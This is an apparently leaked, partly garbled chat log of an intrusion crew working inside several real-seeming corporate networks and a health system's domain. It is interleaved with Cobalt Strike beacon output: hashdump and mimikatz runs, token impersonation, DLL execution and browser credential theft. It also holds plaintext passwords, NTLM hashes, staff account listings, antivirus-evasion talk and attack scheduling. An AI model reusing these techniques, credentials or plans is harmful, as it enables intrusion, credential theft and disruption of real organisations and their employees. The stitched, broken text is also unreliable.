MSSQLSvc/BBBK01.bushboard.co.uk:VEEAMSQL2012 >dNSHostName: BBBK01.bushboard.co.uk Ping statistics for 2002:c001:147::c001:147: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), >operatingSystem: Windows Server 2012 Datacenter >servicePrincipalName: MSSQLSvc/testmove.bushboard.co.uk:VEEAMSQL2012 >dNSHostName: testmove.bushboard.co.uk Ping statistics for 2002:c001:15c::c001:15c: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), >operatingSystem: Windows Server 2016 Standard >servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2012 >servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2016 >dNSHostName: BBDC03.bushboard.co.uk Share name Type Used as Comment ------------------------------------------------------------------------------- ADMIN$ Disk Remote Admin Bushboard Backups Disk C$ Disk Default share E$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC iTop-2.6.1-4463 Disk log Disk SQL_Server Disk U$ Disk Default share UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system. 
VBRCatalog Disk vCenterBackups Disk WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system. WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance. >operatingSystem: unknown >dNSHostName: ltn01-vcenter01.bushboard.co.uk Ping statistics for 2002:c001:111::c001:111: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), So the rtcompany has raised the question) so we were not told we needed it yet have a backup server listing prepared? Live Computers: Wilsonart.com srv: 128 / 141 arm: 676 / 2587 uk.Wilsonart.com srv: 22 / 25 arm: 44 / 157 eu.Wilsonart.com srv: 36 / 43 arm: 2 / 10 uk.Wilsonart.com srv: 1 / 1 WI.RWP.COM srv: / 60 arm: / 515 SLF.LOCAL srv: 8 / 10 arm: 49 / 66 resopal.lan srv: 26 / 27 arm: 11 / 100 ralpwilson.com srv: 1 / 1 polyrey.net srv: 53 / 64 arm: 45 / 340 BUSHBOARD.CO.UK srv: 10 / 17 arm: 26 / 136 arborite.com srv: 9 / 12 arm: 29 / 154 ``We'll still ave to disconnectHow about a new clean coba? We're doping and ready to go`` bod01-bkp01.eu.Wilsonart.com (via 445) login: eu.wilsonart.com\svcveeam NTLM: 0e7674530ce330128b4425c70fb97f92 `````` ukwavcsa1.uk.wilsonart.com admin.ychang 12Pa$w0rd. ``fuck. here we had two spheres in europe # we went into them # one is metrovaya, the other, as we assumed no snapshots they fly off to the backup server on the vinda's 12Pa$$w0rd ``` admin.ychang 8af4a85a0c80719d98341961187c81fd `````` eu.Wilsonart.com\Grelles2 Azerty02 `````` eu.Wilsonart.com\blanchp2 Chloe2019 ``petsnashli? So what``` >description: Vcenter Server >dNSHostName: bod01-vce01.eu.wilsonart.com net view \bod01-vce01.eu.wilsonart.com /all System error 53 has occurred. The network path was not found. 
Ping statistics for 10.40.60.70: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 10.40.60.70:9443 10.40.60.70:9087 10.40.60.70:9084 10.40.60.70:8084 10.40.60.70:8008 10.40.60.70:7444 10.40.60.70:5580 10.40.60.70:5480 10.40.60.70:5060 10.40.60.70:2020 10.40.60.70:2015 10.40.60.70:2014 10.40.60.70:2012 10.40.60.70:2000 10.40.60.70:1514 10.40.60.70:636 10.40.60.70:514 10.40.60.70:443 10.40.60.70:389 10.40.60.70:110 10.40.60.70:88 10.40.60.70:80 10.40.60.70:25 10.40.60.70:21 `````` resopal.lan\Metzler CN=Backup Operators Netz_1020 resopal.lan\Chang CN=Backup Operators 99Lustballons! `````` polyrey.net\Grellety CN=Admin_VCENTER Polyrey70 polyrey.net\Blanchard CN=Admin_VCENTER Louanne50 `````` eu.Wilsonart.com\bod01.svc.vcenter Jupit3r= ```:space_invader:hello allGood eveningXDa said so)Fuck... You say that))) may be rolled and the other pk from your group Admin:1001:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865::: the pc group you are sitting on now I do not understand what group you are talking aboutthis Admin account should roll on this group in fact the pc group look at the car which you sit nowsostav in the local admins? and soot in the pc in this groupa try to check Admin through smb login as local admin here misset (` `) beacon> hashdump [*] Tasked beacon to dump hashes [+] host called home, sent: 82501 bytes [+] received password hashes: Admin:1001:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865::: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:07b16da56f8d9389b7e093bab1b90983::: ``Handsome man'') +sploit? 
There is a system by my saved messages from ms outlook abhinav.bhaskar chandan koushik.s mohit.goel nitin.choudhary pritam sudhir varun vivek.kumar The command completed successfully. ``Be looking furtherxxm, it's unlikely you'll be able to brute force====== CredEnum ====== what's the group? From seabelt what's the hash? Target : LenovoSsoSdkDidToken UserName : LenovoSsoSdk Password : b9352d67360260a670e5fcea3efebe7faae0b5baabb1339247f07fa2e6b5d0270 CredentialType : Generic PersistenceType : LocalComputer LastWriteTime : 13-07-2020 13:59:07 Target : DeviceMetrics UserName : DeviceMetricsUserName Password : 0023b668-0ad7-4e6e-aefe-8822e1471728,00002d6ae2381ed4ebd88db03cdc8b991d025b7db8a551556d269716eb1e3352616ea972f08db23cf983371a2ed7fc6c6a2ea7c687a290111e51545c94c5873a CredentialType : Generic PersistenceType : LocalComputer LastWriteTime : 11-12-2019 15:03:33 ``` Can you unload it? You're better off) No trusts, can you continue to work in the vault? beacon> run rundll32 c:\Users\abinash.pattnayak\AppData\Local\Microsoft\XboxLive\AuthStateCache.dll entryPoint [*] Tasked beacon to run: rundll32 c:\Users\abinash.pattnayak\AppData\Local\Microsoft\XboxLive\AuthStateCache.dll entryPoint [+] host called home, sent: 116 bytes I'll give you the dll))) Especially the Indians) It's worth it for me))) happay.in+I'm waiting for you to decide on the "validity" and I'll send you the dll okSnap through the verification view not taken off? macafee by the way not really biting AB ====== AntiVirus ====== Engine : Windows Defender ProductEXE : windowsdefender:// ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe Engine : McAfee VirusScan ProductEXE : C:\Program Files\McAfee.com\Agent\mcupdate.exe ReportingEXE : C:\Program Files\Common Files\mcafee\mmsshost\MMSSHOST.exe [*] Completed collection in 0.06 seconds ``okjg look av``. beacon> make_token JDOSSN\nddevbernst Tractor20! 
[*] Tasked beacon to create a token for JDOSSN\nddevbernst
[+] host called home, sent: 47 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell dir \\10.28.92.108$
[*] Tasked beacon to run: dir \10.28.92.108$
[+] host called home, sent: 52 bytes
[+] received output:
We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential.

There is a session in the Cobalt. From the entry PC you can see 15 machines (42 in total); the network has only servers (2008-2019). 445, SQL, FTP and web ports are closed. The user apparently has not used the account for a long time, or only uses the Citrix web interface, since he has no files at all. There is only one DA on the network and his Kerberos ticket is there. Searching for files, shares, etc. gave nothing (the browser is not used, and there is no password manager either). GPP, Zerologon - bypassed. A mass scan of what is next to the network by mask gave nothing, except those that were already lit up before. No way to understand it - tried all the LPE exploits from msf.
Tell me in one last message what's been done so far
It's the same. None of the exploits worked. Give me a new one)
and then give me a new one
Even 15 minutes for the checkpoint I can't get to
The LPE exploits in msf - nothing works; a lot of the LPEs failed because it's Windows Server and not 10, and so on
so what do we have here? then think about it, and if you miss, give a replacement LPE
and Windows found nothing on port 445
the plan is to continue with LPE; chisel will come soon, as usual waiting for an hour
but for the future, we need to look for where the admin is, so far so)
and do you already have something to go on?)
some serious AV there, be careful
oooh, what AV?
[ ](https://mediaeveryone.com/group/pkgprod?msg=SKZBNqfdN6jjNDciK) is it like this?
and you found it, yes?
but it's tomorrow, or via WMI startup
suggest making a share and throwing the DLL there
decided to make an image of the system and deploy it locally?))
what do you have there at all for 4 GB?
then write to the address) 104....140 yours?
200 MB
* and moreover files over 200 GB in compressed form are not downloaded through Cobalt
files over 50 MB get archived
what are you downloading there in general?
user2-2

beacon> download C:\ProgramData\trustdmp_17.txt
[*] Tasked beacon to download C:\ProgramData\trustdmp_17.txt
[+] host called home, sent: 70 bytes
[-] File 'C:\ProgramData\trustdmp_17.txt' is either too large (>4GB) or size check failed

and the subnets were taken away? (https://mediaeveryone.com/channel/general?msg=HsR2bCoAz5ywv56vK)
@tl1 call the department please, otherwise he won't answer again.
a couple of shellcodes were sent to him to bypass Symantec
release
give me a sign of life, so that I'm not writing to myself
need to urgently make #1-done-rtpcompany-com the priority now
104.....69 Cobalt, there are still live ones there

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
rtpco.local

but it's old, you need to update all the access info in the conference
inopnomdidic+user?
and so? I don't see any new sessions in it, I don't see your Cobalt
uternicus.com 74.118.138.118
domain Cobalt
No flylel
or give me a psh stager, I'll throw it into my Cobalt
want a dll
@user3 load, go) thank you
`waterway.com` do the conference please
`z3 will be on #wilsonart-com`
now I'll prepare the second grid for work, who will take it over?
[ ](https://mediaeveryone.com/channel/general?msg=oR3f2Th2ZEpq7J4DW)
Yes, you can of course still look for a cna as an option)
you could assign a symbol in the note of each color :zany_face:
as far as I know you cannot)
to be beautiful? =)))))
I think not
@tl1 @tl2 in the Cobalt, can you implement sorting sessions by color?
the network seems small, accesses and DA work right on the entry point
e1 network so far
give silkodia in the conference, screenshots
kidalnete sessions did not fall off?
ok, and what about yesterday's session?
it hasn't really scrambled anything yet
with wilsonart, work later or give a dll?
@tl1 where to yank those 2 sessions with DA?
hello
greetings :space_invader:
see you tomorrow) goodnight) eh
Goodnight night night night
tomorrow, that is today, goodnight all
do not forget that tomorrow at 5 there will probably be a cross with quarantine)
look at the DNS, WSUS / SCCM servers in all trusts; got through, by the way, except quarantine
I do not understand, we burned that `` or something ``

beacon> shell ping LRH-NESSUS01.lrhc.local
[*] Tasked beacon to run: ping LRH-NESSUS01.lrhc.local
[+] host called home, sent: 59 bytes
[+] received output:
Ping request could not find host LRH-NESSUS01.lrhc.local. Please check the name and try again.

dn:CN=LRH-NESSUS01,OU=LRHC Servers,DC=lrhc,DC=local

beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:
=== Chrome (All Users) ===
[X] Exception: Could not find a part of the path 'C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data'.
=== Checking for Firefox (All Users) ===
=== Checking Windows Vaults ===
[-] Invoke_3 on EntryPoint failed.

He got it from SharpChrome, and what's that?
C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://support.lrhc.org/,https://support.lrhc.org/,9/7/2017 12:27:56 PM,13149278876245510,,MasterKey needed - {12d56280-2898-47c4-ba2c-aaf64ced6463} C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://lansweeper.lrhc.local/,http://lansweeper.lrhc.local/,9/7/2017 2:11:31 PM,13149285091430011,,MasterKey needed - {12d56280-2898-47c4-ba2c-aaf64ced6463} ``?'' mail accesses nothing interesting there can be accesses from accountsdump browser then from winlogon exactly the same as in winlogon? beacon> logonpasswords [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command [+] host called home, sent: 296058 bytes [+] received output: ERROR kuhl_m_sekurlsa_acquireLSA ; Key import beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SafetyKatz.exe [*] Tasked beacon to run .NET program: SafetyKatz.exe [+] host called home, sent: 836651 bytes [+] received output: [*] Dumping lsass (572) to C:\WINDOWS\Temp\debug.bin [X] Dump failed: False [+] received output: [*] Executing loaded Mimikatz PE .#####. mimikatz 2.1.1 (x64) built on Jul 7 2018 03:36:26 - lil! .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi' ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz ## v ## Vincent LE TOUX ( vincent.letoux@gmail.com ) # # '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # Opening : 'C:\Windows\Temp\debug.bin' file for minidump... 
ERROR kuhl_m_sekurlsa_acquireLSA ; Memory opening ``cmelliott this one didn't get dumped this one is not on siteada I and so dump the logonpas if they are on site then look for their pku the two remaining hashes have not passed on kmd5 only with the label IT there is a clear only from gsnelsonjuju the result is kind of clear tasks `` `` 10.5.50.228:445 (platform: 500 version: 5.1 name: IT03 domain: LRHC) `````` >sAMAccountName: cmelliott >description: IT >sAMAccountName: ljcurrie >description: Clinical System Analyst II >sAMAccountName: gsnelson >description: PRH IT Coordinator ``+ go to the trustshersti their pc and check the mail from the list above take the guys with a descriptive ITa, well this know) in any case you have a hooked socket, all reopened messages (reset label "unread") because of your actions back, so do not delete anything, do not write, do not call, do not forward) `` `` >memberOf: CN=PRH CPSI Admins,OU=PRH Distribution Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local >sAMAccountName: gsnelson >description: PRH IT Coordinator ``` ``` >memberOf: CN=PRH CIS - RW,OU=PRH Security Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local >sAMAccountName: slarsen >description: Listed as Shawn Larsen account shawn >sAMAccountName: gsnelson >description: PRH IT Coordinator >sAMAccountName: PRHADMIN >description: MEI's and Grant's Admin account for lrhc ``` ``` >memberOf: CN=PRH_support,OU=Groups,DC=lrhc,DC=local >sAMAccountName: ldkugler >description: CIS >sAMAccountName: smhanson >description: CIS >sAMAccountName: mdflugstad >description: CIS >sAMAccountName: trthormodson >description: CIS >sAMAccountName: mjkvern >description: CIS >sAMAccountName: shanson >description: CIS >sAMAccountName: jdpettigrew >description: CIS >sAMAccountName: cmelliott >description: IT >sAMAccountName: sbgravning >sAMAccountName: gsnelson >description: PRH IT Coordinator ``` ``` >memberOf: CN=G_CISTechs,OU=CIS,OU=Departments,DC=lrhc,DC=local >sAMAccountName: mjblank 
>description: Systems Analyst >sAMAccountName: jyrkwa >description: CIO >sAMAccountName: smhanson >description: CIS >sAMAccountName: mdflugstad >description: CIS >sAMAccountName: trthormodson >description: CIS >sAMAccountName: mjkvern >description: CIS >sAMAccountName: shanson >description: CIS >sAMAccountName: cmelliott >description: IT >sAMAccountName: sbgravning >sAMAccountName: gsnelson >description: PRH IT Coordinator ``` ``` >memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local >sAMAccountName: ldkugler >description: CIS >sAMAccountName: mjblank >description: Systems Analyst >sAMAccountName: jyrkwa >description: CIO >sAMAccountName: smhanson >description: CIS >sAMAccountName: llpearso >description: CIS >sAMAccountName: mdflugstad >description: CIS >sAMAccountName: trthormodson >description: CIS >sAMAccountName: cbstigen >sAMAccountName: mjkvern >description: CIS >sAMAccountName: shanson >description: CIS >sAMAccountName: jdpettigrew >description: CIS >sAMAccountName: ljcurrie >description: Clinical System Analyst II >sAMAccountName: cmelliott >description: IT >sAMAccountName: sbgravning >sAMAccountName: gsnelson >description: PRH IT Coordinator ``` ``` >memberOf: CN=CIS.Techs,OU=CIS,OU=Departments,DC=lrhc,DC=local >sAMAccountName: smhanson >description: CIS >sAMAccountName: mdflugstad >description: CIS >sAMAccountName: mjkvern >description: CIS >sAMAccountName: shanson >description: CIS >sAMAccountName: cmelliott >description: IT >sAMAccountName: sbgravning >sAMAccountName: gsnelson >description: PRH IT Coordinator ``` ``` >memberOf: CN=IT,OU=CIS,OU=Departments,DC=lrhc,DC=local >sAMAccountName: mtsuser >description: Pargon Admin >sAMAccountName: Administrator >description: Built-in account for administering the computer/domain >sAMAccountName: mjblank >description: Systems Analyst >sAMAccountName: jyrkwa >description: CIO >sAMAccountName: smhanson >description: CIS >sAMAccountName: mdflugstad >description: CIS >sAMAccountName: magrel >sAMAccountName: 
mjkvern >description: CIS >sAMAccountName: shanson >description: CIS >sAMAccountName: frsecure >description: FRSECURE account for network test >sAMAccountName: cmelliott >description: IT >sAMAccountName: parafhir >description: FHIR user >sAMAccountName: sbgravning >sAMAccountName: tableauadmin >sAMAccountName: ocmagrel >sAMAccountName: ocansi >sAMAccountName: ocbdi >sAMAccountName: occoldagt >sAMAccountName: ocsign >sAMAccountName: ocbatchcmp >sAMAccountName: ocile >sAMAccountName: ocindexagt >sAMAccountName: ocpurge >sAMAccountName: octransagt >sAMAccountName: ocweb >sAMAccountName: ocfaxin >sAMAccountName: ocadmin >sAMAccountName: OCARCREL >sAMAccountName: gsnelson >description: PRH IT Coordinator ``` ``` >memberOf: CN=Computer Information Systems,OU=CIS,OU=Departments,DC=lrhc,DC=local >sAMAccountName: djkrog >description: CIS >sAMAccountName: ldkugler >description: CIS >sAMAccountName: mjblank >description: Systems Analyst >sAMAccountName: jyrkwa >description: CIO >sAMAccountName: smhanson >description: CIS >sAMAccountName: llpearso >description: CIS >sAMAccountName: mdflugstad >description: CIS >sAMAccountName: taaxness >description: Clinical Systems Analyst II >sAMAccountName: trthormodson >description: CIS >sAMAccountName: cbstigen >sAMAccountName: mjkvern >description: CIS >sAMAccountName: shanson >description: CIS >sAMAccountName: jdpettigrew >description: CIS >sAMAccountName: ljcurrie >description: Clinical System Analyst II >sAMAccountName: cmelliott >description: IT >sAMAccountName: sbgravning >sAMAccountName: gsnelson >description: PRH IT Coordinator ``` ``` >memberOf: CN=CIS Support,OU=CIS,OU=Departments,DC=lrhc,DC=local >sAMAccountName: djkrog >description: CIS >sAMAccountName: ldkugler >description: CIS >sAMAccountName: mjblank >description: Systems Analyst >sAMAccountName: jyrkwa >description: CIO >sAMAccountName: smhanson >description: CIS >sAMAccountName: mdflugstad >description: CIS >sAMAccountName: intranet >description: LRHC's Intranet Access 
>sAMAccountName: taaxness >description: Clinical Systems Analyst II >sAMAccountName: trthormodson >description: CIS >sAMAccountName: cbstigen >sAMAccountName: mjkvern >description: CIS >sAMAccountName: shanson >description: CIS >sAMAccountName: jdpettigrew >description: CIS >sAMAccountName: ljcurrie >description: Clinical System Analyst II >sAMAccountName: cmelliott >description: IT >sAMAccountName: sbgravning >sAMAccountName: gsnelson >description: PRH IT Coordinator In addition to not taking anything there, can you tell me if there is something we do not know? Do you need to tell the rules or is it that obvious? search for his username, hostname, etc. through the local exxcheck his email in chrome no credentials saved, only visible in the login gotda, authorization asked what was shown? did you run the client? in chrome history showed that he logged in to the sphere + he had a client installed and you said he was gone for a few days you said you found where he had the client installed I don't understand something) only found that he went to the sphere - nothing else so what did you find? 3) we went through the RDP - he was gone for several days so here's the plan: 1) now look more "interesting" people from the groups above and the classics look at their pk 2) go to their mail server under the codes of your internal DA and other IT staff and look at their correspondence for access on the sphere 3) wait for `gsnelson` to get off the car and go to rp and try to get in 4) get into the trust, it looks like there's an admin one {\10.91.19.35\volume_1}) go to another trustshaloon and did not say))) I took the quarantine through another domain, how did you take it off?) I did) @user7 you took the quarantine from there[ ](https://mediaeveryone.com/group/lrhc-org?msg=MQjLTQ8JLjE8EH4qy) is there a hell of a lot of info? 
Shared resources at 10.91.19.35
DNS-323

Share name   Type    Used as   Comment
-------------------------------------------------------------------------------
lp           Print             USB Printer
Volume_1     Disk
web_page     Disk              Enter Our Web Page Setting
The command completed successfully.

Shares for 10.91.19.35:
[--- Unreadable Shares ---]
lp
IPC$
[--- Listable Shares ---]
Volume_1
web_page

Give it net view
NAS in quarantine... hmmm, is there such a thing in quarantine, are we interested?
10.91.19.35:445 (platform: 500 version: 4.9 name: IT-DLINK-NAS domain: ELEAH)
[--- Listable Shares ---]
Volume_1
web_page

Windows authorization didn't go through either, didn't you get the root password? Did you try it? Win 10?
Was it in the processes on the computer? Do you have his client in his processes?
Was there a vSphere client in his processes, but the login guy gsnelson has access? where the vSphere client was.
1) do we have access to the RDP there? 2) what is his username?
Yes, I'm collecting a list
so is anyone here?
``memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local`` this one is not needed
1) do we have access to RDP there? 2) what is his login? where was the vSphere client?
all the others here: list login name + their title, description.
>memberOf: CN=PRH CPSI Admins,OU=PRH Distribution Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local >memberOf: CN=PRH CIS - RW,OU=PRH Security Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local >memberOf: CN=PRH_support,OU=Groups,DC=lrhc,DC=local >memberOf: CN=G_CISTechs,OU=CIS,OU=Departments,DC=lrhc,DC=local >memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local >memberOf: CN=CIS.Techs,OU=CIS,OU=Departments,DC=lrhc,DC=local >memberOf: CN=IT,OU=CIS,OU=Departments,DC=lrhc,DC=local >memberOf: CN=Computer Information Systems,OU=CIS,OU=Departments,DC=lrhc,DC=local >memberOf: CN=CIS Support,OU=CIS,OU=Departments,DC=lrhc,DC=local ``[ ](https://mediaeveryone.com/group/lrhc-org?msg=f7BhjsG2Dhj4biXts) yu[ ](https://mediaeveryone.com/group/lrhc-org?msg=X9DRqmQNLciwimKcf) who? ------------------------------------------------------------------------------- Admin Administrator AvamarBackupUser CDW.Tech1 CDW.Tech2 CDW.Tech3 cdw.user01 cisadmin frsecure gsnelson nmsapps OnPremMigAdmin1 OnPremMigAdmin2 OnPremMigAdmin3 PRHADMIN PsService PsSupport Pssupport01 radmin tms01 TMSXE.Service01 UCAdmin WebAdmin found one where you went to the sphere, no credentials saved give me a list and I'll try to look outside the domain they don't have a normal admin computer labeled i went to the oushkek where they should have admin PCs - i told you gsnelson but there are iis and printers everywhere from Administrator on one machine was a link to veeam.com without any credit process YES will be decent on a large number of servers how many got around did not count i go where there are processes on rdp session or hanging process yes gsnelson has a spheres client on his truck, i try to find out how many admins and itspecialists/how many have bypassed?about so many sessions what? @user4 what did i ever say about sessions? 
192.168.0.247 192.168.0.253 ``` they have rdp access to these machines can't session gopher?[ ](https://mediaeveryone.com/group/lrhc-org?msg=zXPB8m4QmuixuSYr2) They don't have SSHCPNBACKUP.lrhc.local if only the keylogger catches them there's nothing They don't save passwords. + kind of go to the sphere through the client, not through the web then shoot without a sessionthere sits YES, open chrome - 10.91.18.119 sessions do not fly there is a list of software on the machines ``{lrhprofiles\admins\pcsysteminfo`` here are files on all computers in them is specified who LA on what machine `` ``` UseWUServer : True Server : http://prh-print01:8530 AlternateServer : StatisticsServer : http://prh-print01:8530 ``` `````` --- Chromium Credential (User: prhlab) --- URL : https://www.api-pt.com/login.aspx Username : 64413 Password : h(e? ?5S --- Chromium Credential (User: prhlab) --- URL : https://www.instrumentationlaboratory.com/us/en Username : manelite Password : ??? o*? --- Chromium Credential (User: prhlab) --- URL : Username : lrhc\nlarson Password : ??=?rGK --- Chromium Credential (User: prhlab) --- URL : Username : lrhc:\nlarson Password : Jih.63*d --- Chromium Credential (User: prhlab) --- URL : Username : nlarson Password : Jih.63*d ``` ``` >sAMAccountName : bnlarson >memberOf : CN=LRHC_Replica_Users ```192.168.0.90``` Bookmarks (cblascyk): Name : WorkPlace Login URL : http://10.10.30.212/workplace/Central/Login.aspx?Message=&Popup=0&ONLOGIN=http%3a%2f%2f10.10.30.212%2fworkplace%2fCentral%2fDashboard.aspx Name : CelériTime URL : http://10.10.30.223/ctapp/Login.aspx Bookmarks (jschmidgall): Name : CelériTime URL : http://10.10.30.223/ctapp/Login.aspx Name : Workplace URL : http://10.10.30.212/workplace/Central/Dashboard.aspx ```192.168.0.192``` CN=OCMAGREL,OU=Service Admins, ````ocmagrel`` this username is found everywhere`` 10.10.39.194:9443 10.10.39.194:9087 10.10.39.194:9084 10.10.39.194:8084 10.10.39.194:7444 10.10.39.194:6502 10.10.39.194:6501 
10.10.39.194:5580 10.10.39.194:5480 10.10.39.194:2020 10.10.39.194:2015 10.10.39.194:2014 10.10.39.194:2012 10.10.39.194:636 10.10.39.194:443 10.10.39.194:389 10.10.39.194:88 10.10.39.194:80 Good night, good night, good night... 3 a.m. we'll close by tonight and you'll have 7 hours to get ready... that's it 8 a.m. let's sleep it off, just tell me what time to be there? if you have any suggestions ready to listen so what? enough time? 7-8 p.m. Evening in any case, it should be done during their working hours when the admins will be in the networkcalculate that you need to find access to the sphere after 3 a.m. So either end before 5 at local time for sure will not runaday laterWhat time are we going to?i.e. for today i can't on sunday so why don't we reschedule for tomorrow?) and we won't scan the whole range. they just scanned without specifying ports[ ](https://mediaeveryone.com/group/lrhc-org?msg=na3M7jsTWpYMhC59u) everything was strange sphere, no web interface, no ccsh... they may have changed the ports - let's check it outThey have a lot of places + they may go to the lin through itWhy are you looking for vnts? service RealVNC.SYSTEM.vncserver.vncagent.978162299 -_hash 6023144d82c1866db090b27f884c921c310b505ca9dd0f5be587de06362dc59b and ea-check the accesses themselves dare guys found, but they say there are still empty cars admins? well then while we chisel the current should be finished but from Mon there will be other work da(and tomorrow is Saturday (well, in general the line is one and in one domain leave for tomorrow? but I have not yet checked it) well if trusts remote from each other I think daona be in all 3? so we will not close it today) There are 3 trusts. and in none of them yet found a sphereuser9 it is Access is denied. 
rash that with the system, that with the tokenTo remove something need to be in the process user?[ ](https://mediaeveryone.com/group/lrhc-org?msg=2ibwanQe7KArEiJAb) these?(Not one computer from 45 containing in the name of adm is not pinged? User: gsnelson - IP Address: 10.91.19.227 User: gsnelson - IP Address: 192.168.0.89 User: nmsapps - IP Address: 10.10.30.24 User: Administrator - IP Address: 10.10.39.105 User: Administrator - IP Address: 10.10.30.123 User: PsSupport - IP Address: 10.10.30.249 User: PRHADMIN - IP Address: 10.91.19.7 ``Rumor has it, I'll try it through tulkit, it seems to work better with sniper. [-] Invoke_3 on EntryPoint failed. Have you tried the sharpshooter case? >sAMAccountName: baleitch >memberOf: CN=G VNC_User `````` >sAMAccountName: gdhoff >memberOf: CN=G VNC_User `````` beacon> shell ping Scott.lrhc.local [*] Tasked beacon to run: ping Scott.lrhc.local [+] host called home, sent: 176 bytes [+] received output: Ping request could not find host Scott.lrhc.local. Please check the name and try again. `````` >dNSHostName: Scott.lrhc.local >memberOf: CN=Administrators ``` ``` dn:CN=Hanson\, Scott >sAMAccountName: smhanson >memberOf: CN=CIS_VNC >memberOf: CN=Backup Notification `````` 192.168.254.36:445 (platform: 500 version: 5.1 name: EMEDWRKSTN domain: WORKGROUP) `````` LRH-RDP01.lrhc.local ``` is written in web)you can use a torbrower to check if this kind of thing ``` OfficeMate®, the most widely used server-based practice management solution in the optical industry, offers a secure experience with extensive tools to manage billing, appointment scheduling and inventory ``written into sql''. 
>dNSHostName: OFFICEMATE.lrhc.local >servicePrincipalName: MSSQLSvc/OFFICEMATE.lrhc.local:62380 >servicePrincipalName: MSSQLSvc/OFFICEMATE.lrhc.local:OMSQL >servicePrincipalName: TERMSRV/OFFICEMATE.lrhc.local >servicePrincipalName: TERMSRV/OFFICEMATE >servicePrincipalName: WSMAN/OFFICEMATE.lrhc.local >servicePrincipalName: WSMAN/OFFICEMATE >servicePrincipalName: RestrictedKrbHost/OFFICEMATE >servicePrincipalName: HOST/OFFICEMATE >servicePrincipalName: RestrictedKrbHost/OFFICEMATE.lrhc.local >servicePrincipalName: HOST/OFFICEMATE.lrhc.local ``honestly sort the fuck out in smtp?'' apparently this fuckin' thing is prefixed by ``LRHR```` SMTP: SAGESRVR.lrhc.local LRHRECRUIT.lrhc.local ``lazange seems to be pulling everything@tl1 Tell me if there is something for coba to pull the vnc-credits from, as it seems to me `` vncserver.exe vmtoolsd.exe ``It looks like a separate category judging by its name, not sql`` at all >dNSHostName: SAGESRVR.lrhc.local >servicePrincipalName: SMTPSVC/SAGESRVR.lrhc.local >servicePrincipalName: SMTPSVC/SAGESRVR >servicePrincipalName: MSSQLSvc/SAGESRVR.lrhc.local:1433 >servicePrincipalName: MSSQLSvc/SAGESRVR.lrhc.local >servicePrincipalName: TERMSRV/SAGESRVR.lrhc.local >servicePrincipalName: TERMSRV/SAGESRVR >servicePrincipalName: WSMAN/SAGESRVR.lrhc.local >servicePrincipalName: RestrictedKrbHost/SAGESRVR.lrhc.local >servicePrincipalName: HOST/SAGESRVR.lrhc.local >servicePrincipalName: WSMAN/SAGESRVR >servicePrincipalName: RestrictedKrbHost/SAGESRVR >servicePrincipalName: HOST/SAGESRVR ``[ ](https://mediaeveryone.com/group/lrhc-org?msg=8ZDxnERPvj8tGcfR4) then why not a thermal server? SAGESRVR.lrhc.local ``[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=Kcbqn5Nru9WgNaqns) I'm busy)²svot and fine)oy just about me)strong, nimble, brave and skillful and no one told me that you're short of peopleuser9 needs one volunteer for another mission Directory of E:\Backup\VeeamConfigBackup\BGUKHOVEEAM 20/01/2021 11:06 AM . 20/01/2021 11:06 . 
